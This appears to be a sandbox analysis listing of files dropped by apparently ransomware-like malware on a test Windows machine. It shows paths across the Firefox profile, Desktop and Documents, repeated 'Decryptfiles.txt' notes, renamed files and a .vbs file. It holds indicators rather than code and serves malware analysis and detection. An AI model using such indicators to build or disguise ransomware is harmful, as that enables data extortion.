C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm.HtvE (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-wal.kIhf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json.IXZn (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lock.FXRH
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal.YNXd
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.YnEI
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.ljOI
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.tiBv
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
|
big endian ispell hash file (?),
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.gJOW
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.hQNu
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.MclI
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-wal.nxmV
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.json.EBes
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\installs.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\_curlrc.SbgX
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Contacts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\ATJBEMHSSB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\BQJUWOYRTO\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\BWETZDQDIB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\NIRMEKAMZH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\QFAPOWPAFG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\UBVUNTSCZJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.png
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.png.unVz (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\LFOPODGVOH.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\VWDFPKGDUF.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\WDBWCPEFJW\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\WSHEJMDVQC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\AQRFEVRTGL.png
|
data
|
dropped
|
||
C:\Users\user\Documents\ATJBEMHSSB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\BQJUWOYRTO.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\BQJUWOYRTO\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Documents\BWETZDQDIB\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\HQJBRDYKDE.png
|
data
|
dropped
|
||
C:\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\LHEPQPGEWF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\GNLQNHOLWB.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx
|
PGP Secret Sub-key -
|
dropped
|
||
C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.png
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Documents\NIRMEKAMZH\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PWZOQIFCAN.png
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\QFAPOWPAFG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\UBVUNTSCZJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\HMPPSXQPQV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\WDBWCPEFJW\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\WSHEJMDVQC\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\BWETZDQDIB.mp3
|
data
|
dropped
|
||
C:\Users\user\Downloads\Decryptfiles.txt
|
